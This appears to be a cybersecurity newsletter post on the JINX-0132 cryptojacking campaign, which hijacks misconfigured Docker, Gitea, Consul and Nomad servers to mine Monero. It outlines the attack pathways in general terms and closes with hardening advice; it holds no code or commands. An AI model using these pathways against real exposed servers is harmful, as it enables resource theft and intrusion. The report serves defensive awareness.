• Cyber Syrup
  • Posts
  • Cryptojacking Campaign Exploits Misconfigured DevOps Tools

Cryptojacking Campaign Exploits Misconfigured DevOps Tools

Cybersecurity researchers from cloud security firm Wiz have uncovered a new cryptojacking campaign, JINX-0132, that targets misconfigured and publicly accessible DevOps web servers

June 03, 2025

In partnership with

CYBER SYRUP
Delivering the sweetest insights on cybersecurity.

Optimize global IT operations with our World at Work Guide

Explore this ready-to-go guide to support your IT operations in 130+ countries. Discover how:

  • Standardizing global IT operations enhances efficiency and reduces overhead

  • Ensuring compliance with local IT legislation to safeguard your operations

  • Integrating Deel IT with EOR, global payroll, and contractor management optimizes your tech stack

Leverage Deel IT to manage your global operations with ease.

Cryptojacking Campaign Exploits Misconfigured DevOps Tools

Cybersecurity researchers from cloud security firm Wiz have uncovered a new cryptojacking campaign, JINX-0132, that targets misconfigured and publicly accessible DevOps web servers. This campaign leverages platforms such as Docker, Gitea, HashiCorp Consul, and Nomad to illicitly mine cryptocurrency, primarily Monero (XMR) using the popular XMRig miner.

The campaign is notable for both its scale and its tactics, exploiting known misconfigurations and vulnerabilities across commonly used DevOps tools.

A First for HashiCorp Nomad Exploits

In what is believed to be the first publicly documented case of its kind, the attackers have been observed exploiting misconfigured HashiCorp Nomad servers in the wild. Nomad is a workload orchestrator for deploying applications on virtual machines and containers, widely used in modern infrastructure stacks.

By compromising Nomad instances that manage hundreds of connected clients, the attackers are gaining access to significant CPU and RAM resources. According to Wiz, the amount of computing power hijacked in this campaign would cost tens of thousands of dollars per month if obtained through legitimate cloud services.

Technical Attack Pathways

1. Docker API Exploitation

Exposed Docker APIs have long been a target for cryptojacking campaigns. In JINX-0132, attackers utilize public Docker endpoints such as /containers/create and /containers/{id}/start to:

  • Spin up malicious containers

  • Mount the host file system

  • Download and execute cryptocurrency mining images

This technique enables remote code execution with minimal user interaction.

2. Gitea Remote Code Execution

Gitea, a lightweight Git repository hosting solution, is vulnerable to RCE under certain conditions:

  • If the INSTALL_LOCK configuration is left as false

  • If an attacker gains access to a user account that can create git hooks

  • If the server is running Gitea version 1.4.0, which contains known vulnerabilities

The attackers use these avenues to upload and run malicious scripts, creating a persistent foothold in the system.

3. HashiCorp Consul Service Registration Abuse

If not secured properly, Consul allows remote users to register new services and add health checks. These health checks can include bash commands, which will be executed automatically.

JINX-0132 abuses this feature to register services with malicious health checks, effectively turning the server into a cryptocurrency miner.

4. Nomad Job Scheduling Misuse

In its default configuration, Nomad’s server API is not secured, meaning anyone with access can create and run new jobs. The attackers use this to:

  • Schedule jobs with malicious commands

  • Download XMRig miners directly from GitHub

  • Execute them on all connected Nomad clients

By hosting payloads on GitHub, the attackers avoid using suspicious or traceable infrastructure, complicating attribution efforts.

Global Exposure

According to Shodan data:

  • Over 5,300 Consul servers and 400 Nomad servers are publicly exposed

  • Top affected regions include China, the United States, Germany, Singapore, Finland, the Netherlands, and the UK

These exposures highlight the global scope of the risk and the need for better DevOps security practices.

Recommendations

1. Secure APIs and Services

  • Lock down Docker, Gitea, Nomad, and Consul APIs to trusted IPs only

  • Apply authentication mechanisms and access control lists (ACLs)

2. Patch and Update

  • Ensure all DevOps tools are running the latest versions

  • Apply relevant patches for vulnerabilities such as CVE-2020-14144

3. Audit Configurations

  • Set INSTALL_LOCK=true in Gitea

  • Remove unused or insecure default configurations in Nomad and Consul

  • Disable anonymous service registration in Consul

4. Monitor Network Traffic

  • Track outbound traffic to mining pools or GitHub links not associated with development

  • Investigate unusual CPU or memory usage across DevOps infrastructure

Conclusion

The JINX-0132 campaign is a stark reminder that misconfigured infrastructure can be as dangerous as unpatched vulnerabilities. As attackers increasingly exploit automation platforms and orchestration tools, DevOps and security teams must work together to harden configurations, monitor environments, and respond rapidly to suspicious activity.

Maintaining good cyber hygiene is not just about protecting code—it's about safeguarding the infrastructure that delivers it.